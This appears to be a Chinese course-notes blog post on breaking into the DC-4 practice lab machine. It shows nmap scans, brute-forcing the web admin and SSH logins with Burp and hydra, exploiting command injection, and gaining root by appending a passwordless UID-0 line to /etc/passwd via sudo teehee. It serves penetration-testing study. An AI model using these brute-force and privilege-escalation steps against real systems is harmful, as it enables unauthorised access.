[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

 

往期博客:

第一阶段:

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)

[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)

第二阶段:

[网络安全学习篇25]:初识Linux及简单命令

[网络安全学习篇32]:Linux脚本编写汇总及应用

第三阶段:

[网络安全学习篇33]:0基础带你入门python

[网络安全学习篇38]:基础环境搭建

[网络安全学习篇39]:HTML标签基础 常用的标签 表格

[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)

[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]:JS 基础 函数 事件

第四阶段:

[网络安全学习篇49]:渗透测试方法论

[网络安全学习篇50]:Web架构安全分析

[网络安全学习篇51]:信息收集

[网络安全学习篇52]:扫描技术

[网络安全学习篇53]:口令破解

[网络安全学习篇54]:SQL注入

[网络安全学习篇55]:SQL自动化注入

[网络安全学习篇56]:XSS

[网络安全学习篇57]:XSS(二)

[网络安全学习篇58]:PHP代码注入

[网络安全学习篇59]:OS命令注入

[网络安全学习篇60]:文件上传

[网络安全学习篇61]:文件包含

[网络安全学习篇62]:CSRF 攻击

[网络安全学习篇63]:SSRF

[网络安全学习篇64]:业务安全

[网络安全学习篇65]:提权

[网络安全学习篇66]:Metasploit(MSF)

[网络安全学习篇67]:python poc-exp

[网络安全学习篇68]:反序列化漏洞

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵(本篇)

下期博文:

[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵

 

目录

 

搭建靶场环境

获取其IP地址

访问其80端口

尝试使用bp 进行密码爆破

登录网站

存在命令注入漏洞

对ssh 进行爆破

提权成功,拿到flag


搭建靶场环境

链接:https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A 
提取码:8r7m 

启动DC-4

 

获取其IP地址

 

nmap -sP 192.168.1.2/24

 

nmap -A 192.168.1.167 -p 1-65535 -oN nmap.A

 

访问其80端口

 

尝试使用bp 进行密码爆破

我们猜测其用户名很可能是admin,对admin用户密码进行爆破

 

添加密码字典

设置线程500

 

爆破成功,得到其密码happy

 

登录网站

使用[admin/happy]登录成功

 

我们发现可以执行一些系统命令

 

通过抓包,观察

 

存在命令注入漏洞

 

查看passwd 文件

 

依次查看各用户的家目录,在jim用户的家目录下发现旧的密码备份文件

 

将这些密码复制到kali 创建密码字典

vim old_passwd.bak

 

创建用户名字典

vim user.dic

charles

jim

sam

 

对ssh 进行爆破

hydra -L user.dic -P old_passwd.bak ssh://192.168.1.167 -vV -o hydra.ssh

 

得到账密[jim/jibril04]

尝试使用ssh 登录

ssh jim@192.168.1.167

成功连接

 

cd /var/mail

cat jim

 

尝试使用[charles/^xHhA&hvim0y]登录

 

查看可以不需要密码就可以使用root权限执行的命令

sudo -l

 

teehee -help

查看帮助信息,这条命令可以在文件的最后追加命令

 

在psaawd 文件末尾追加

sudo teehee -a /etc/passwd

GGG::0:0:::/bin/bash

 

提权成功,拿到flag


参考文献:

千峰网络信息安全开源课程

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beglage

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值